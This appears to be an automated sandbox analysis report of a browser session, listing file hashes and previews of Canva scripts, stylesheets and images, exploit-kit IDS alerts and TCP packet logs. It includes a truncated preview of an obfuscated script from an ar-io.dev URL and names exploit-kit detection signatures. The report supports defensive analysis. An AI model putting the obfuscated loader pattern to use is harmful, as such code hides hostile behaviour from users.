                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1389],{../***/ 813110:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var Eh;var Og;var fh;var $g;var Pa;var Uf;var Rf;var nf;var Ne;var Le;var te;var se;var Yd;var od;var sd;var $c;var hd;var cd;var gd;var G;var ad;var T;var E;var Za;var K;var Yc;var Zc;var bd;var Q;var D;var Nc;var O;var id;var Oa;var Na;var W;var L;var M;var ca;var Sc;var uc;var tc;var mc;var nb;var A;var ab;var Ka;var B;var t;.var baa,ha,ia,ka,ua,eaa,jaa,iaa,haa,gaa,maa,oaa,paa,qaa,Ga,Ia,La,Ma,raa,Wa,vaa,uaa,Ra,Sa,Ta,Va,Xa,Qa,saa,taa,ib,Daa,Faa,ob,Haa,Iaa,Jaa,pb,Maa,Naa,xb,vb,Zaa,Vaa,$aa,Raa,Cb,iba,nba,rba,qba,sba,oba,vba,Jb,wba,xba,Lb,Aba,Bba,Cba,Dba,Eba,Fba,Gba,Hba,Iba,Kba,Jb
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (35828)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):796858
                                                                                                                                                                                                                                                                    Entropy (8bit):5.608470933371809
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:24576:2knDbcX34oynJY/OQJwSxnV7wuTKwh/+et2RbsF4IpHZk34D+yMoiTaEIUR5eb18:2knDbcX34oynJY/OQJwSxnV7wuT3p+eA
                                                                                                                                                                                                                                                                    MD5:13358100E6EE465EA5E11AA3ABCB07C8
                                                                                                                                                                                                                                                                    SHA1:E0F7323D9F96EB31F6C33574725B7B0D1AC30539
                                                                                                                                                                                                                                                                    SHA-256:0BC9958E8BE3D13CAA9B206D883136D6B57404A27E134AF255848596E6211D21
                                                                                                                                                                                                                                                                    SHA-512:B8ABB6E38A6BBC6447B2E1AD7B766CB7B4DB256217FD0E06A0A9E241BBBEE645E31BC0EE2091DBF465D0EDB9EC796C3D4BE75470148266EADF159063CEB086BC
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://chunk-composing.canva.com/chunk-batch/6adf981daf016320.js+ca6752412b124ab8.js+39a6195c40e885cb.js+d1746f2be639385d.vendor.js+e5858b9acd7eacfd.js+ac32d7d2559049fb.vendor.js+5c8428ff8946c2bc.vendor.js+8bb5c083c329cabd.vendor.js+f35481ca3aa7c0b1.vendor.js+7fa913dc41885224.js+a6f54230679b881b.js+4eea533da91b843b.js+68b4a56d49d06d5b.js+669a9c3f49529a1a.js+e0c33afc52136d6f.strings.js+f2ef215a4b1973ce.js+a4fa1dfb6c5bbab1.js+37310646f6c0cb67.js+470e84c5f0282c19.js+9020ba20c4c9bfa3.js+3153d733bc77daa7.js+916035f5f725fd3d.js+3e4a0f2f12f57b0a.js+927a6d6ab1e9b047.js+0551db2cd60e1299.js+adbadea387f83326.js+338f11e66f186039.js+2c6dd549e6f23a4d.js+4c2713f515715d55.js+14da071be375bc00.js+18acabe5ca80518c.js+5ca0a34b6e381def.js+eea9cc7d4f9eb5b6.js+2fdff918b6f47278.js+469a5a0d65ded138.js+2d9ada8959d4d1e3.js
                                                                                                                                                                                                                                                                    Preview:;// __FILE_CONTENT_FOR__:6adf981daf016320.js.(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1991],{../***/ 552859:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var Nh;var Fpa,Gpa;__c.Mh=function(a){return new Promise(b=>setTimeout(b,a))};__c.zpa=function(a){return a.every(b=>"object"!==typeof b)};Nh=__c.Nh=function(a){const b={};for(const d of Object.keys(a)){var c=a[d];null==c||"function"===typeof c||"symbol"===typeof c||Number.isNaN(c)||"number"===typeof c&&!Number.isFinite(c)||(Array.isArray(c)?(c=__c.zpa(c)?c:c.map(Nh),c=c.filter(()=>!0),b[d]=c):b[d]="object"===typeof c?Nh(c):c)}return b};.__c.Oh=function(a){return Nh({design_id:a.Ub,design_version:a.dMa,doctype_id:a.kb,category_id:a.Lk,connected_client_ids:a.QMb,time_since_navigation_start:a.W4b,page
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5886)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):5949
                                                                                                                                                                                                                                                                    Entropy (8bit):5.511308287820502
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:96:BFR/r8JFQRu4py0geKlc65mlrA//CWW0JsupRRZZWPSSaSNjk5:X3VA/q0HRJWDaMI5
                                                                                                                                                                                                                                                                    MD5:9BFBE66BA889320C5F6DFC8325A43C40
                                                                                                                                                                                                                                                                    SHA1:385D9A3056F7DF7F58F65C8A6D84798BE0CF4434
                                                                                                                                                                                                                                                                    SHA-256:3A5C6B26844E6F41F97CB05A164D0BBCA17B4B8508DFC6AFD07A5E76EB5B2E66
                                                                                                                                                                                                                                                                    SHA-512:96D067BBB6859A568B988B1DD9A8662D59DF0FB86BB07686073EBB9C401F1DAEAB22516037CD86D0CA95ED1B06C4A47039D5C18AE13AABB4AB8C45F361DC97A6
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/228115b6a6e5e8e3.ltr.css
                                                                                                                                                                                                                                                                    Preview:._94P4tA{outline:none}.theme{color-scheme:var(--4h-m_A)}.light{--4h-m_A:light;--Zpa-KA:#00c4cc;--eGVbng:#8b3dff;--M5_pvA:#7731d8;--boKKWg:#612dae;--oqurdw:rgba(64,87,109,.07);--d1p99w:#fff;--17LfHw:rgba(36,49,61,.4);--EgWgfg:rgba(13,18,22,0);--X3--Zg:rgba(64,87,109,.07);--xfy86Q:rgba(57,76,96,.15);--p53f_Q:rgba(13,18,22,0);--REcY5g:#0d1216;--XajtPQ:rgba(36,49,61,.4);--FVk7Ew:rgba(165,112,255,.15);--2-zmYA:rgba(165,112,255,.15);--ySYdsQ:rgba(165,112,255,.2);--aMXh3A:rgba(64,87,109,.07);--_RN1Dg:#612dae;--8fGzbw:rgba(36,49,61,.4);--ob8tTA:rgba(13,18,22,0);--MghLXQ:rgba(64,87,109,.07);--3R4u8w:rgba(57,76,96,.15);--TwiLcg:rgba(13,18,22,0);--QeQ0Dw:#0d1216;--TZOI7A:rgba(36,49,61,.4);--SZMkXA:rgba(165,112,255,.15);--1zesEA:rgba(165,112,255,.15);--AMxRgw:rgba(165,112,255,.2);--BZ60Jw:rgba(64,87,109,.07);--8Ex5gA:#612dae;--spIP2A:rgba(36,49,61,.4);--KtXlRg:rgba(17,23,29,.6);--QADODw:rgba(13,18,22,.7);--kTBxcw:rgba(13,18,22,.86);--HxK_kw:rgba(17,23,29,.6);--6u-yJQ:#fff;--J0YKvA:hsla(0,0%,100%,.
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):4414
                                                                                                                                                                                                                                                                    Entropy (8bit):5.9195472440471955
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:96:v6LQztmnE2hqFJmd7l0TlPInbSqVpWV9gr9Fb3+:bs4oCTlGbSqVpWXw9p
                                                                                                                                                                                                                                                                    MD5:A0C86DA7FC37EA50E848C4733761D53E
                                                                                                                                                                                                                                                                    SHA1:7B53A4FE8198AA654C02282134DCC19E0C07CC9A
                                                                                                                                                                                                                                                                    SHA-256:EC2FBAD47E598FE06C7A2B825224B3B1B8D8221F3002E6370E627D459FF0634A
                                                                                                                                                                                                                                                                    SHA-512:6FD3BB6D1392F89DCF63A37A9086517620A63C6D933885ACDB61F99BB8AF137D2DD184C59EF92C173E214711DCEAE9585A5B574AFB422A4A0969D99C86264339
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:...... .... .(.......(... ...@..... ......................................................@...........#h..!g\."h..!i..#k..$l..$n..$o..%q..%r..'s[.#t..........@...................................................UU..........,]).+_..)b..*j..)l..'l..%l..$k..#m..$q..&u..(y..(z..&t..&u..%v)..........U......................................@@..........3Y..1[..4b..1]..0\..0^../`..,c..+f..)i..&l..%o..%q..&s..&t..)|..'v..(v..........@...............................33......8X .7V..;]..7V..8W..7W..7X..8Z..=_..?b..?e..<g..5g..-i..*m..(q..&s..&t..'u..*...(x..(x .....3f......................@@......CN..?R..@W..=R..=R..>S..?S..GZ..<S...?...5...6...@..!T..?f..;i..0j..-o..)s..'u..'w..*}..(y..'z......@...............UU......PP .HL..IO..EN..DO..CN..GQ..GQ...!..HR................ly...B...O..Dh..7g..3l...q..)v..(w..)|..)z..(x ......U..................SG..UK..PG..NI..LI..NN..FF..76..................................|....>..He..=e..8i..3o..-t..*w..+...){..............@......\A..cG..ZB..XC..VD..VG..QC..OA...
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):1865
                                                                                                                                                                                                                                                                    Entropy (8bit):4.5836861143934104
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:24:t8BQuQeRMDZCgVaMjCLSR9gVa/DtCLSX3GcCTEtRupMxaF7zDNKVoStCG/zoWSiN:Yhc7Vf0HVzG3GBMDURxbWlPjJH9J3mBe
                                                                                                                                                                                                                                                                    MD5:3E78EF31F2928A74C6D7BA19B91D0570
                                                                                                                                                                                                                                                                    SHA1:FA840BD4404B1B843A72164F2491AF6C4718A214
                                                                                                                                                                                                                                                                    SHA-256:847435388F6B42D6C869D02DF3EC08D61333A19AC4B90EBBFF3BC0B87B60A202
                                                                                                                                                                                                                                                                    SHA-512:0B1951AD9492468748B18217003BF7EBAD56FA14CB434C37D6DF2440C43D73AF5AA9068EC517596E9D63B150F3ED28C20F44FFCD6814DF70D2C9228C91994DDE
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:<svg width="33" height="32" viewBox="0 0 33 32" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M32.29 16c0 8.837-7.164 16-16 16-8.837 0-16-7.163-16-16 0-8.836 7.163-16 16-16 8.836 0 16 7.164 16 16Z" fill="url(#_3900663394__a)"/><path d="M26.131 15.809c-.055-.127-1.41-3.103-4.195-3.103-2.783 0-4.138 2.976-4.195 3.103a.47.47 0 0 0 .136.556c.165.134.4.138.575.013.011-.009 1.188-.849 3.484-.849 2.284 0 3.458.83 3.485.848a.469.469 0 0 0 .574-.01.471.471 0 0 0 .136-.558ZM14.836 15.809c-.056-.127-1.41-3.103-4.195-3.103-2.783 0-4.138 2.976-4.194 3.103a.47.47 0 0 0 .71.569c.011-.009 1.187-.849 3.484-.849 2.284 0 3.458.83 3.485.848a.468.468 0 0 0 .574-.01.47.47 0 0 0 .136-.558ZM28.524 14.118a.943.943 0 0 1-.874-.592c-1.673-4.183-5.856-5.064-5.898-5.074a.94.94 0 1 1 .369-1.844c.212.041 5.229 1.099 7.278 6.219a.942.942 0 0 1-.875 1.291ZM4.053 14.118a.941.941 0 0 1-.873-1.291c2.048-5.12 7.065-6.178 7.277-6.22a.94.94 0 0 1 .373 1.845c-.174.036-4.242.923-5.902 5.074a.944.944 0 0 1-.875.592ZM
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:PNG image data, 198 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):4094
                                                                                                                                                                                                                                                                    Entropy (8bit):7.93859777191053
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:96:ZqkvToZX/t0SQ35xTTmGe21ngkM3TjBCxIo38zFvPfP:UkLCF0SQvLe21nZM3RCxIo38z5fP
                                                                                                                                                                                                                                                                    MD5:FA5F603DBF55DF49E3B3B3F2D9ADCE13
                                                                                                                                                                                                                                                                    SHA1:826C4617C7ABE1F011AC873055C7C6AE50C8077B
                                                                                                                                                                                                                                                                    SHA-256:32A0C97649E80BF4FE7EB7AB3EC47A7C851FA7927C330AE9DEF7480936EBB06F
                                                                                                                                                                                                                                                                    SHA-512:4184E7E55D44E86A913D81320A12D685C06E13CCF495D76EF99BEDE0C0D49B9EB80381B54EB716DB08C0517EED0603FF75520A12C1F3912EB06B862BD6055BB0
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......g.......A....sRGB.........IDATx....K.a.....K(aF(..Z.R....K.Jw..Q.]<..T].5Z..t.H....-..uI.Fs..8..nH.........Y.. .y.ex`...yn.@.%%..%...I.>...J.I...$.H..I...$....I...@R...I...@R...I. )@R.....X..8.n.#"..z..wU{..P....).j....._...^......K$.t.*.U!)._.....mw...{...c._=mo......AUH.HR....p.n....5.~Lh..I.Mj\.{..e;...........AD.Q!)$U$)#..........Vfq.OJW...y.U.Z.n...j.<.......nn.".;....=.w=.w.<....]Z.%.....S.....#.k......?I.....k6<..S..(~....TW^kl.z.t.../Qc....>>V..r6'pH.I.!..&..aM........=1..TM..._.]A.y....o[.l.6.egs&cl}m;|}.T.D.QI...GE./...7.<BUH...5...|......*...o.Ck..jSA...;.....P...J.b..l...s./.k..>..Z...".U)Z....kn.s<d..Hn....,ff5...3k..4/n...;......d.s)Cj."...:.?..E.....H.S\_...vo..9.......K.q..(....:7......\..Q.-W`.C...!..K={....]J.m.yQ.#....6s2.VTd....x.K..V.FC....?..Z..U...#j...jo...q.$5f.......5..uI<..#......Z.$.'...'O.G.JW.4N.b#mLgEQ..QOj.O>.q.c......Z.R....bYw...8.d..VSD..w..p..{.....3+cvu.TU.GD.....6fE...x..
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (319)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):382
                                                                                                                                                                                                                                                                    Entropy (8bit):5.439423170296592
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:6:1WR69mWE2cMAU1NEd4QHCN7Sgoq4ROSNJRYQDPC33w9DMPjiI:1WRqE/gt7SjOSNlDPC3g9YWI
                                                                                                                                                                                                                                                                    MD5:0EECBA4C5EADF6A40CDC31DBAB617AF9
                                                                                                                                                                                                                                                                    SHA1:6F716C76C6F64979124AAE9C3114DE6F374C7626
                                                                                                                                                                                                                                                                    SHA-256:0AA923A81790C6F42A4C0AF6D018FA86D8BE69D98EE9C21FEDB280443279365A
                                                                                                                                                                                                                                                                    SHA-512:E8A64EE7E57CE610AA76E43B24E6DC5C95B41A11C838B6AD8EBE23862F5B817103DA5D553055046D1CB1ED06F6076FF98DAAC9CFDF9EEBC6E86D5D47609B6484
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/9e2d4720ffac5af4.ltr.css
                                                                                                                                                                                                                                                                    Preview:.ygGKTQ{box-sizing:border-box;display:inline-block;vertical-align:text-bottom}.ygGKTQ._61VRqQ{height:12px;width:12px}.ygGKTQ.abulbg{height:16px;width:16px}.ygGKTQ.AAwCeg{height:18px;width:18px}.ygGKTQ.dR8M7g{height:24px;width:24px}.ygGKTQ._1aCkfA{height:32px;width:32px}.ygGKTQ>svg{display:block;height:100%;width:100%}./*# sourceMappingURL=sourcemaps/9e2d4720ffac5af4.ltr.css.map*/
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (20072)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):20112
                                                                                                                                                                                                                                                                    Entropy (8bit):6.162997630607568
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:384:XuzNqy1WEo5WE1vSAZx/kVRPm+fy6e+J8rd7OZsBonWSSv+43EdALecvsGQ8GZr+:ezNqGQlvSAZx/kLm+a6dGrd7OZsBonn6
                                                                                                                                                                                                                                                                    MD5:C5583B8997FC43956A4DA97EDDEAA1BF
                                                                                                                                                                                                                                                                    SHA1:01A86D4AE898BA3D39C7450E8A1C74C2EC5E1469
                                                                                                                                                                                                                                                                    SHA-256:9439E22FF85CB788416D9C9475D1020E52185EBFB3AA08A3C569D66A0D7F8520
                                                                                                                                                                                                                                                                    SHA-512:8A76D3CB9B2A10DB5A91973A5E1E0EA8969E885FA9ECF42D851E2F546F87C3F6747475B1E751A7E196E67E6AF5C886C1C2974633E2E8FEF1F10FFF9723B50CC1
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuI
                                                                                                                                                                                                                                                                    Preview:<script>.var rh13z8jemt = '';.var mpcqV0B,i2mOkIx,LXcNsp,abRZZF,nKFbsZM,lywKtpV,iTgyqJ,g_BXfS,C8NYpr,MXkLyo,hEQtBV,Pak0FZ,wvfeLQP,u2ePaO,id6_JC;function j3P3La(i2mOkIx){return mpcqV0B[i2mOkIx<-0x3f?i2mOkIx-0x17:i2mOkIx+0x3e]}mpcqV0B=XV7mQK5.call(this);function NqVM4vj(mpcqV0B,i2mOkIx){Object.defineProperty(mpcqV0B,j3P3La(-0x3e),{value:i2mOkIx,configurable:!0x0});return mpcqV0B}var BYQ917=[],xDYEPY=0x0,lgGhS5=pct_5_(()=>{var mpcqV0B=['x2@z{*^*m$@gyN)ZHSd3njbdZ!7@^j!q)fz:Yod1CJ_(hE1c&L8:(.sSs4GX#+il8lE=7+&Mt1ci_vZcEdXxM!aCkN.(2xqm^/i;Q0fT(5K6UDwb8,)K~/NvqOtxo7ITP,EF^!{u$SfKz6pfw,jK^y%Bp!DJtQ$R~7UdO3=N97~5;aKU}Iwxd`}usLfU}v^p}c*yx)z;/%,#D+djQo*,_<_op6v*nbFllwWf9z2Sv#T3~k{Wpamc4.vpiJ<k=w!q1)(dl4I6u&iKyZ{b0w(=Q<fT+NaU)b%enr]z}7*;U$1/CmRU^n$2k2`dg#Pl^OpaB8:II866;7lfJw|d#/ZzJkpB56j*ayie`fOHS<WkgPz@Slyo{nw2h9DN7IdwTOwbFaY/4zJHP#4E6[nf#c^=Mkrjt!s!JQ&e]+`cwx;N?1<:H^OU~IQhoe6SGK<j*Ysn2X8:`vQ{R#4E6[YcQo><_<*p9!QDj6Hfsi1:Y0d5wPI)=ZpnkM52"`<SEN=xnODlcXjd_!!Cu#,L4D@ihl+Ec`YuM!DJcvnm"!81q+.6gP)=ZESb4,
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2200)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):11142
                                                                                                                                                                                                                                                                    Entropy (8bit):5.31739747905786
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:192:fL1AdpM4UOi1MhKqKzbWDThTI7E7wnLjunj9KNfM7k2RXZ0wcTqRGaubS:fL1YMDOi1uKqKzbWDThTmEkLjunpofMz
                                                                                                                                                                                                                                                                    MD5:0A5B04B991FA42E0D9ABCEF0B0109428
                                                                                                                                                                                                                                                                    SHA1:BFFECB1F316B78DFDB15F0FA430C99C39F2AC214
                                                                                                                                                                                                                                                                    SHA-256:4A70AF94E6A936ABDE696205B28B4709AC956CD222290EE8AC54C2C558A716BE
                                                                                                                                                                                                                                                                    SHA-512:F642BBC3C33B1BCA766D0624E5A659D9F3E047CC33A44EBD4AF731EF44D63F3D5D552814AB171471D0D603853D80BFCA8B5B9452E6F8E632D3C2BDFDF4B6AC7D
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6264],{../***/ 9164:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var Ca=__c.Ca;var rQa,QA,RA,sQa,uQa,UA,xQa,wQa,yQa,zQa,AQa,VA,BQa,XA;rQa=function(a){return a instanceof Error?"QuotaExceededError"===a.name||a instanceof DOMException&&22===a.code||a instanceof qQa:!1};QA=function(a){const b=Error(a);return c=>{c instanceof Error&&(null==c.stack||""===c.stack)&&(c.stack=b.stack);return c}};.RA=function(a){return new Promise((b,c)=>{const d=()=>{a.removeEventListener("success",e);a.removeEventListener("error",g)},e=()=>{d();b(a.result)},f=QA("idb promisify_request_events error"),g=()=>{d();c(f(a.error))};a.addEventListener("success",e);a.addEventListener("error",g)})};sQa=async function(a,b){const c=a.xn(a.curs
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):1404
                                                                                                                                                                                                                                                                    Entropy (8bit):4.114328576097192
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:24:t414ffo3Q0QIvvdznG0UezpigqybgrKrPO20hLMXlr9NkOf/qd0mdz9w/zAI:CH3Q0dvRG0zvBMOr10mx9m8vUAb
                                                                                                                                                                                                                                                                    MD5:ABA10B640F15BB01B8E5F0B804EEFC7F
                                                                                                                                                                                                                                                                    SHA1:65D1EDB21B0F31D4CCB9703EB05132A0E42D093D
                                                                                                                                                                                                                                                                    SHA-256:6A21FCEDE3E9D5593CF90C894BC059A94BBAE8D5D22ED0AC5511A1327F276881
                                                                                                                                                                                                                                                                    SHA-512:FDC916824C065944D02B7956BE310F01B9A56562BBB1510C345EDC925EA6CE478D235B5348AD140028CFA4F483BF1E947533CB83176A9F44DC13353A938329DF
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#FFDB5E" d="M34.956 17.916c0-.503-.12-.975-.321-1.404-1.341-4.326-7.619-4.01-16.549-4.221-1.493-.035-.639-1.798-.115-5.668.341-2.517-1.282-6.382-4.01-6.382-4.498 0-.171 3.548-4.148 12.322-2.125 4.688-6.875 2.062-6.875 6.771v10.719c0 1.833.18 3.595 2.758 3.885C8.195 34.219 7.633 36 11.238 36h18.044a3.337 3.337 0 0 0 3.333-3.334c0-.762-.267-1.456-.698-2.018 1.02-.571 1.72-1.649 1.72-2.899 0-.76-.266-1.454-.696-2.015 1.023-.57 1.725-1.649 1.725-2.901 0-.909-.368-1.733-.961-2.336a3.311 3.311 0 0 0 1.251-2.581z"/><path fill="#EE9547" d="M23.02 21.249h8.604c1.17 0 2.268-.626 2.866-1.633a.876.876 0 0 0-1.506-.892 1.588 1.588 0 0 1-1.361.775h-8.81c-.873 0-1.583-.71-1.583-1.583s.71-1.583 1.583-1.583H28.7a.875.875 0 0 0 0-1.75h-5.888a3.337 3.337 0 0 0-3.333 3.333c0 1.025.475 1.932 1.205 2.544a3.32 3.32 0 0 0-.998 2.373c0 1.028.478 1.938 1.212 2.549a3.318 3.318 0 0 0 .419 5.08 3.305 3.305 0 0 0-.852 2.204 3.337 3.337 0 0 0 3.
                                                                                                                                                                                                                                                                    No static file info
                                                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                    2024-11-20T16:02:06.081494+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.1249911172.217.21.36443TCP
                                                                                                                                                                                                                                                                    2024-11-20T16:02:08.817960+01002022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 20151192.168.2.1249923142.250.181.68443TCP
                                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:13.528114080 CET49673443192.168.2.12173.222.162.60
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:13.529361010 CET49674443192.168.2.12173.222.162.60
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:13.887489080 CET49672443192.168.2.12173.222.162.60
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:22.631470919 CET49715443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:22.631521940 CET44349715205.139.111.12192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:22.631861925 CET49715443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:22.632730007 CET49715443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:22.632742882 CET44349715205.139.111.12192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:22.636238098 CET49716443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:22.636281013 CET44349716205.139.111.12192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:22.636743069 CET49716443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:22.637274027 CET49716443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:22.637294054 CET44349716205.139.111.12192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:23.138971090 CET49674443192.168.2.12173.222.162.60
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:23.139005899 CET49673443192.168.2.12173.222.162.60
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:23.561420918 CET49672443192.168.2.12173.222.162.60
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.069351912 CET44349716205.139.111.12192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.069864988 CET49716443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.069889069 CET44349716205.139.111.12192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.070945978 CET44349716205.139.111.12192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.071005106 CET49716443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.072856903 CET49716443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.072928905 CET44349716205.139.111.12192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.073029041 CET49716443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.073040009 CET44349716205.139.111.12192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.157701969 CET44349715205.139.111.12192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.157979965 CET49715443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.157998085 CET44349715205.139.111.12192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.159074068 CET44349715205.139.111.12192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.159138918 CET49715443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.159617901 CET49715443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.159681082 CET44349715205.139.111.12192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.169550896 CET49716443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.200436115 CET49715443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.200449944 CET44349715205.139.111.12192.168.2.12
